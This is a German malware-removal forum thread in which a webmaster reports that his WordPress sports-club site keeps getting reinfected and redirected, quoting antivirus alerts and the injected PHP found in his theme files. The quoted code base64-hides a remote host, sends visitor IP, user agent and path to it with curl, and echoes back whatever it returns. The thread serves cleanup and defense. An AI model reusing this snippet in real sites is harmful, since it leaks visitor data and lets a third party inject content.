Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Eigene Webseite mit Malware verseucht

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

 
Alt 18.02.2013, 23:05   #1
martinbu
 
Eigene Webseite mit Malware verseucht - Standard

Eigene Webseite mit Malware verseucht



Hallo zusammen,

ich kenne das Forum schon länger und bin begeistert von dem Service der hier geboten wird. Jetzt ist es soweit, dass ich selber ein Problem habe, mit dem ich selber nicht mehr weiter komme. Ich hoffe, dass ich hier genauso tolle Hilfe bekomme, wie es viele andere schon bekommen haben.

Ich bin Webmaster einer Internetseite (www.tus-schildgen.de). Schon seit Monaten habe ich immer wieder mit Viren auf der Seite zu kämpfen. Verschiedene Virenmeldungen, die ich im Laufe der letzten Monate von verschiedenen Leuten bekommen habe, hänge ich an. Der Höhepunkt war dann, dass die Webseite auf einen virenverseuchten Fantasyblog (blog.fantasygifts.com) weitergeleitet wurde, hierzu habe ich keine Virenmeldung. Meist konnte ich das Problem lösen, indem ich über FileZilla alle Dateien gelöscht und ersetzt habe, die in der letzten Zeit geändert wurde. Das Passwort habe ich dann auch immer geändert. Allerdings ging das dann immer nur für kurze Zeit gut und die Seite war ein paar Tage später wieder verseucht. Mein Laptop selber ist laut Malwarebytes virenfrei.

Jetzt habe ich mich mal intensiver mit dem Problem beschäftigt. Nun kann ich aktuell die Seite ohne Virenmeldung aufrufen, ich habe AntiVir als Virenscanner installiert.

Im Internet habe ich recherchiert und bin auf folgende Seite gestoßen: hxxp://evuln.com/hacked/redirect.html#1

Im Verlauf meiner weiteren Recherche stieß ich dann noch auf diesen Artikel: hxxp://paid4magazin.de/index.php/base64-eval-php-script-hack-php-trojaner-befallt-webseiten-durch-malware/

Die beiden Seiten, besonders der zweiten Artikel beschreibt genau den Malware-Code, der in den verseuchten Dateien von mir (siehe letztes angehängtes Zitat) vorhanden ist. Betroffen waren verschiedene index.php sowie page.php und footer.php. Diese habe ich alle bereinigt und der Code ist nun in keiner Datei auf der Webseite mehr vorhanden. Ist die Seite jetzt virenfrei?

Ich habe immer die aktuellste Wordpress-Version sowie aktuellste Plugins installiert gehabt. Jedoch nie die Themes aktualisiert, da ich eins selber modifziert hatte. Vielleicht lag hier der Fehler? Jetzt ist die aktuellste Version installiert. Momentan ist zwar noch etwas Chaos, aber das wird noch beseitigt.

Damit liegt das Problem (zumindest das aktuelle, wie es mit den älteren Virenmeldungen aussieht weiß ich nicht) scheinbar auf meinem eigenen Rechner. Malwarebytes zeigt jedoch keine Meldungen an.

Ich hoffe, ich habe soweit alles an Informationen gegeben, die benötigt werden um mir Erste-Hilfe zu leisten. Ziel ist es, die Webseite vollständig virenfrei zu bekommen und auch gegen zukünftige "Angriffe" zu sichern. Gibt es für die verschiedenen Virenmeldungen und das aktuelle Probleme was ich zum Schluss beschrieben habe die selbe Ursache oder handelt es sich um verschiedene Baustellen? Auch die Frage: Kann mir jemand eine Alternative zu FileZilla nennen, da hier ja ebenfalls das Problem liegen könnte? Vielen Dank schon einmal für eure Bemühungen!

Grüße,
Martin

NACHTRAG: Genau dieses Problem scheint schon länger zu bestehen. In einem alten Backup von September 2012 habe ich genau denselben Code gefunden, lediglich mit leichtgeändertem "aHR0[...]"-Schnipsel. Hier schon waren genau dieselben 10 Dateien betroffen wie aktuell auch. Also liegt hier vielleicht wirklich die Ursache für die ganzen Virenmeldungen?

Zitat:
Zitat von Virenmeldung
Kategorie:Intrusion Prevention

Datum/Uhrzeit,Risiko,Aktivität,Status,Empfohlene Aktion,Name der IPS-Warnung,Standardaktionen,Durchgeführte Aktion,Angreifender Computer,Angreifer-URL,Zieladresse,Quelladresse,Beschreibung des Datenverkehrs

25.09.2012 18:34:06,Hoch,Ein Eindringversuch von www.tus-schildgen.de wurde blockiert.,Blockiert,Keine Aktion erforderlich,Web Attack: Mass Injection Website,Keine Aktion erforderlich,Keine Aktion erforderlich,"www.tus-schildgen.de (80.67.28.124, 80)",www.tus-schildgen.de/,"HASSOPC (xxx.xxx.x.xxx, xxxxx)",xx.xx.xx.xxx (80.67.28.124),"TCP, www-http"

Netzwerkverkehr von <b>www.tus-schildgen.de/</b> entspricht der Signatur eines bekannten Angriffs. Der Angriff wurde von \DEVICE\HARDDISKVOLUME1\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE verursacht.
Zitat:
Zitat von Virenmeldung
angeforderte URL: hxxp://www.tus-schildgen.de/

Information: Enthält Erkennungsmuster des Java-Scriptvirus JS/Blacole.CV
Zitat:
Zitat von Virenmeldung
Angeforderte URL: hxxp://www.tus-schildgen.de/
Information: Enthält Erkennungsmuster des Java-Scriptvirus JS/iFrame.aas
Zitat:
Zitat von Virenverseuchter Code
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

Geändert von martinbu (18.02.2013 um 23:19 Uhr) Grund: siehe Nachtrag

 

Themen zu Eigene Webseite mit Malware verseucht
alternative, antivir, baidu, computer, dateien, dateien gelöscht, explorer, fehler?, frage, gelöscht, google, ics, iexplore.exe, internet explorer, laptop, malware, malwarebytes, msn, opera, passwort, problem, scan, server, tcp, viren, virus, yahoo




Ähnliche Themen: Eigene Webseite mit Malware verseucht


  1. Verdächtige Webseite (Malware oder Trojaner)
    Plagegeister aller Art und deren Bekämpfung - 16.09.2015 (3)
  2. Win7 mit Malware verseucht, läuft langsamer als üblich
    Plagegeister aller Art und deren Bekämpfung - 07.03.2014 (13)
  3. Als attackierend gemeldete Webseite! // Malware notification from Google
    Log-Analyse und Auswertung - 19.06.2013 (23)
  4. virus, Trojaner und malware! möchte eigene Dateien auf usb stick kopieren / verschieben
    Plagegeister aller Art und deren Bekämpfung - 20.04.2013 (11)
  5. Eigene Webseite mit Trojaner infiziert
    Überwachung, Datenschutz und Spam - 01.04.2013 (1)
  6. email link Malware Funde Heur.PE@4294967295, Malware@#nwdk01o66rpro, Malware@#2x6qrvr63cjrw
    Plagegeister aller Art und deren Bekämpfung - 29.10.2012 (10)
  7. Tool im Malware in Webseite zu erkennen
    Antiviren-, Firewall- und andere Schutzprogramme - 02.09.2012 (9)
  8. Schwarze Symbolleisten (Kein Zugriff auf Eigene Dateien oder Eigene Bilder)
    Plagegeister aller Art und deren Bekämpfung - 15.04.2012 (1)
  9. 50 €-Virus, sind eigene Dateien verseucht?
    Plagegeister aller Art und deren Bekämpfung - 05.03.2012 (1)
  10. Webseite evtl. verseucht mit "http://blood1.cu.cc/in.cgi?2"???
    Plagegeister aller Art und deren Bekämpfung - 25.01.2012 (0)
  11. Mein PC ist verseucht zB. Malware iexplore.exe etc.
    Plagegeister aller Art und deren Bekämpfung - 14.11.2011 (1)
  12. Malware, verstecke Objekte -> Laptop verseucht
    Log-Analyse und Auswertung - 07.11.2011 (29)
  13. Avira findet Malware im System32 ordner , eigene Datein wie gelöscht.
    Log-Analyse und Auswertung - 26.04.2011 (5)
  14. Ist diese Webseite verseucht ?
    Plagegeister aller Art und deren Bekämpfung - 01.06.2010 (12)
  15. Webseite Malware TR
    Plagegeister aller Art und deren Bekämpfung - 30.05.2010 (1)
  16. Demo runtergeladen - Malware-verseucht? plus Google-Problem
    Plagegeister aller Art und deren Bekämpfung - 31.08.2009 (7)
  17. Verseucht malware auch die wiederherstellungs partition?
    Log-Analyse und Auswertung - 20.02.2009 (0)

Zum Thema Eigene Webseite mit Malware verseucht - Hallo zusammen, ich kenne das Forum schon länger und bin begeistert von dem Service der hier geboten wird. Jetzt ist es soweit, dass ich selber ein Problem habe, mit dem - Eigene Webseite mit Malware verseucht...
Archiv
Du betrachtest: Eigene Webseite mit Malware verseucht auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.